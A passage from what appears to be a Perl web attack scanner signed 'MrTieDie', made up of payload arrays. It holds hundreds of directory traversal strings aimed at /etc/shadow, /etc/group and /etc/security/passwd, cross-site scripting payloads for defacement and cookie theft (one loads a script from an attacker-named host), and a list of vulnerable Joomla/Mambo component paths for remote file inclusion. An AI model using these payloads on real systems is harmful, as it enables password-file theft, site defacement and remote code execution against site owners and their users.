dow%00","....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....//etc/shadow","....//....//etc/shadow","....//....//....//etc/shadow","....//....//....//....//etc/shadow","....//....//....//....//....//etc/shadow","....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//....//....//etc/shadow","....//etc/shadow%00","....//....//etc/shadow%00","....//....//....//etc/shadow%00","....//....//....//....//etc/shadow%00","....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//....//....//etc/shadow%00","/etc/group","../etc/group","../../etc/group","../../../etc/group","../../../../etc/group","../../../../../etc/group","../../../../../../etc/group","../../../../../../../etc/group","../../../../../../../../etc/group","../../../../../../../../../etc/group","../../../../../../../../../../etc/group","/etc/group%00","../etc/group%00","../../etc/group%00","../../../etc/group%00","../../../../etc/group%00","../../../../../etc/group%00","../../../../../../etc/group%00","../../../../../../../etc/group%00","../../../../../../../../etc/group%00","../../../../../../../../../etc/group%00","../../../../../../../../../../etc/group%00","%2Fetc..%2Fgroup","..%2Fetc%2Fgroup","..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","%2Fetc%2Fgroup%00","..%2Fetc%2Fgroup%00","..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","%2F%2Fetc/group","....%2F%2Fetc/group","....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","/etc/group%00","....%2F%2Fetc/group%00","....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","//etc/group","....//etc/group","....//....//etc/group","....//....//....//etc/group","....//....//....//....//etc/group","....//....//....//....//....//etc/group","....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//....//....//etc/group","//etc/group%00","....//etc/group%00","....//....//etc/group%00","....//....//....//etc/group%00","....//....//....//....//etc/group%00","....//....//....//....//....//etc/group%00","....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//....//....//etc/group%00","/etc/security/passwd","../etc/security/passwd","../../etc/security/passwd","../../../etc/security/passwd","../../../../etc/security/passwd","../../../../../etc/security/passwd","../../../../../../etc/security/passwd","../../../../../../../etc/security/passwd","../../../../../../../../etc/security/passwd","../../../../../../../../../etc/security/passwd","../../../../../../../../../../etc/security/passwd","/etc/security/passwd%00","../etc/security/passwd%00","../../etc/security/passwd%00","../../../etc/security/passwd%00","../../../../etc/security/passwd%00","../../../../../etc/security/passwd%00","../../../../../../etc/security/passwd%00","../../../../../../../etc/security/passwd%00","../../../../../../../../etc/security/passwd%00","../../../../../../../../../etc/security/passwd%00","../../../../../../../../../../etc/security/passwd%00","%2Fetc%2Fsecurity%2Fpasswd","..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","%2Fetc%2Fsecurity%2Fpasswd%00","..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....//etc/security/passwd","....//....//etc/security/passwd","....//....//....//etc/security/passwd","....//....//....//....//etc/security/passwd","....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//....//etc/security/passwd","....//etc/security/passwd%00","....//....//etc/security/passwd%00","....//....//....//etc/security/passwd%00","....//....//....//....//etc/security/passwd%00","....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00","/etc/security/passwd","../etc/security/passwd","../../etc/security/passwd","../../../etc/security/passwd","../../../../etc/security/passwd","../../../../../etc/security/passwd","../../../../../../etc/security/passwd","../../../../../../../etc/security/passwd","../../../../../../../../etc/security/passwd","../../../../../../../../../etc/security/passwd","../../../../../../../../../../etc/security/passwd","/etc/security/passwd%00","../etc/security/passwd%00","../../etc/security/passwd%00","../../../etc/security/passwd%00","../../../../etc/security/passwd%00","../../../../../etc/security/passwd%00","../../../../../../etc/security/passwd%00","../../../../../../../etc/security/passwd%00","../../../../../../../../etc/security/passwd%00","../../../../../../../../../etc/security/passwd%00","../../../../../../../../../../etc/security/passwd%00","%2Fetc%2Fsecurity%2Fpasswd","..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","%2Fetc%2Fsecurity%2Fpasswd%00","..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....//etc/security/passwd","....//....//etc/security/passwd","....//....//....//etc/security/passwd","....//....//....//....//etc/security/passwd","....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//....//etc/security/passwd","....//etc/security/passwd%00","....//....//etc/security/passwd%00","....//....//....//etc/security/passwd%00","....//....//....//....//etc/security/passwd%00","....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00","/etc/security/group","../etc/security/group","../../etc/security/group","../../../etc/security/group","../../../../etc/security/group","../../../../../etc/security/group","../../../../../../etc/security/group","../../../../../../../etc/security/group","../../../../../../../../etc/security/group","../../../../../../../../../etc/security/group","../../../../../../../../../../etc/security/group","/etc/security/group%00","../etc/security/group%00","../../etc/security/group%00","../../../etc/security/group%00","../../../../etc/security/group%00","../../../../../etc/security/group%00","../../../../../../etc/security/group%00","../../../../../../../etc/security/group%00","../../../../../../../../etc/security/group%00","../../../../../../../../../etc/security/group%00","../../../../../../../../../../etc/security/group%00","%2Fetc%2Fsecurity%2Fgroup","..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","%2Fetc%2Fsecurity%2Fgroup%00","..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","%2F%2Fetc/security/group","....%2F%2Fetc/security/group","....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","%2F%2Fetc/security/group%00","....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","//etc/security/group","....//etc/security/group","....//....//etc/security/group","....//....//....//etc/security/group","....//....//....//....//etc/security/group","....//....//....//....//....//etc/security/group","....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//....//....//etc/security/group","//etc/security/group%00","....//etc/security/group%00","....//....//etc/security/group%00","....//....//....//etc/security/group%00","....//....//....//....//etc/security/group%00","....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//....//....//etc/security/group%00");
500. ######
501. @XSS = ("MrTieDie",
502. "<center>Hacked by MrTieDie</center>",
503. "<center><marquee>Hacked by MrTieDie</marquee> </center>",
504. "<CeNTer>MrTieDie</CeNTer>",
505. "='><script>alert(document.cookie)</script>",
506. "&lt;script&gt;alert('Hacked by MrTieDie');&lt;/script&gt",
507. "a?<script>alert('Hacked by MrTieDie')</script>",
508. "<SCRIPT>a=/Hacked by MrTieDie/alert(a.source)</SCRIPT>",
509. "%3Cscript%3Ealert('Hacked by MrTieDie')%3C/script%3E",
510. "<IMG SRC=javascript:alert(String.fromCharCode(56,56,44,56,51,44,56,51))>",
511. "<IMG SRC=javascript:alert('Hacked by MrTieDie')>",
512. "<SCRIPT>a=/MrTieDie/alert(a.source)</SCRIPT>",
513. "<SCRIPT SRC=http://MrTieDie-blackhat.persiangig.com/XSS.JS?<B>");
514.  
515. ######
516. @RFI = ("/components/com_flyspray/startdown.php?file=",
517. "/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=",
518. "/components/com_simpleboard/file_upload.php?sbp=",
519. "/components/com_hashcash/server.php?mosConfig_absolute_path=",
520. "/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=",
521. "/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=",
522. "/components/com_performs/performs.php?mosConfig_absolute_path=",
523. "/components/com_forum/download.php?phpbb_root_path=",
524. "/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=",
525. "/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=",
526. "/components/minibb/index.php?absolute_path=",
527. "/components/com_smf/smf.php?mosConfig_absolute_path=",
528. "/modules/mod_calendar.php?absolute_path=",
529. "/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=",
530. "/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=",
531. "/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=",
532. "/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=",
533. "/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=",
534. "/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=",
535. "/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=",
536. "/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=",
537. "/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=",
538. "/components/com_securityimages/configinsert.php?mosConfig_absolute_path=",
539. "/components/com_securityimages/lang.php?mosConfig_absolute_path=",
540. "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=",
541. "/components/com_galleria/galleria.html.php?mosConfig_absolute_path=",
542. "/akocomments.php?mosConfig_absolute_path=",
543. "/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=",
544. "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=",
545. "/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=",
546. "/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=",
547. "/components/com_zoom/includes/database.php?mosConfig_absolute_path=",
548. "/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=",
549. "/components/com_fm/fm.install.php?lm_absolute_path=",
550. "/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=",
551. "/components/com_lmo/lmo.php?mosConfig_absolute_path=",
552. "/administrator/components/com_webring/admin.webring.docs.php?component_dir=",
553. "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=",
554. "/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=",
555. "/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=",
556. "/components/com_mambowiki/MamboLogin.php?IP=",
557. "/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=",
558. "/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=",
559. "/components/com_cpg/cpg.php?mosConfig_absolute_path=",
560. "/components/com_moodle/moodle.php?mosConfig_absolute_path=",
561. "/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=",
562. "/components/com_mospray/scripts/admin.php?basedir=",
563. "/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=",
564. "/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=",
565. "/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=",
566. "/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=",
567. "/components/com_madeira/img.php?url=",
568. "/components/com_bsq_sitestats/external/rssfeed.php?baseDir=",
569. "/com_bsq_sitestats/external/rssfeed.php?baseDir=",
570. "/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=",
571. "/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=",
572. "/administrator/components/admin.jjgallery.php?mosConfig_absolute_path=",
573. "/components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=",
574. "/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=",
575. "/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=",
576. "/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=",
577. "/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=",
578. "/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=",
579. "/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=",
580. "/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=",
581. "/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=",
582. "/index.php?option=com_custompages&cpage=",
583. "/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=",
584. "/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=",
585. "/components/com_facileforms/facileforms.frame.php?ff_compath=",
586. "/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=",
587. "/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=",
588. "/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=",
589. "/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=",
590. "/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=",
591. "/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=",
592. "/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=",
593. "/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=",
594. "/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=",
595. "/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=",
596. "/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=",
597. "/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=",
598. "/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=",
599. "/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=",
600. "/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=",
601. "/administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=",
602. "/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=",
603. "/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=",
604. "/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=",
605. "/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=",
606. "/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=",
